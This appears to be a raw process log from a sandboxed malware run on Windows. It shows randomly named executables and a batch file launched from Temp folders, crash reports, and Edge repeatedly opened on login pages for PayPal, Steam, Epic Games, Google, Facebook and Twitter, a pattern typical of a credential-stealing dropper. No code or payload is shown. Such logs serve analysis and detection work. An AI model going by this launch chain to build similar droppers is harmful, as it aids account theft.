"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,9359833603542391446,16454255164888473861,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5264 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffdf56146f8,0x7ffdf5614708,0x7ffdf5614718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffdf56146f8,0x7ffdf5614708,0x7ffdf5614718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffdf56146f8,0x7ffdf5614708,0x7ffdf5614718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5132 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffdf56146f8,0x7ffdf5614708,0x7ffdf5614718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5808 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5940 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5952 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffdf56146f8,0x7ffdf5614708,0x7ffdf5614718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6352 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffdf56146f8,0x7ffdf5614708,0x7ffdf5614718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6524 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6520 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4872 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7248 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7252 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7624 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7624 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7760 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7872 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7840 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7000 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\1FF.exe
C:\Users\Admin\AppData\Local\Temp\1FF.exe
C:\Users\Admin\AppData\Local\Temp\2AC.exe
C:\Users\Admin\AppData\Local\Temp\2AC.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cD6gf0cw.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cD6gf0cw.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sC1QR4ep.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sC1QR4ep.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kA2jC6AK.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kA2jC6AK.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3B6.bat" "
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\HG0CX5rO.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\HG0CX5rO.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1XI48lH3.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1XI48lH3.exe
C:\Users\Admin\AppData\Local\Temp\4A2.exe
C:\Users\Admin\AppData\Local\Temp\4A2.exe
C:\Users\Admin\AppData\Local\Temp\58D.exe
C:\Users\Admin\AppData\Local\Temp\58D.exe
C:\Users\Admin\AppData\Local\Temp\6D6.exe
C:\Users\Admin\AppData\Local\Temp\6D6.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdf56146f8,0x7ffdf5614708,0x7ffdf5614718
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\958.exe
C:\Users\Admin\AppData\Local\Temp\958.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7500 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2yh035IN.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2yh035IN.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 6224 -ip 6224
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8180 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6224 -s 204
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4548 -ip 4548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4548 -s 784
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffdf56146f8,0x7ffdf5614708,0x7ffdf5614718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7596 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdf56146f8,0x7ffdf5614708,0x7ffdf5614718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7260 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdf56146f8,0x7ffdf5614708,0x7ffdf5614718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6720 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8408 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdf56146f8,0x7ffdf5614708,0x7ffdf5614718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffdf56146f8,0x7ffdf5614708,0x7ffdf5614718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6708 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8592 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffdf56146f8,0x7ffdf5614708,0x7ffdf5614718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8964 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdf56146f8,0x7ffdf5614708,0x7ffdf5614718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9036 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8908 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\2F9E.exe
C:\Users\Admin\AppData\Local\Temp\2F9E.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=7284 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=9476 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\32EA.exe
C:\Users\Admin\AppData\Local\Temp\32EA.exe
C:\Windows\system32\AUDIODG.EXE
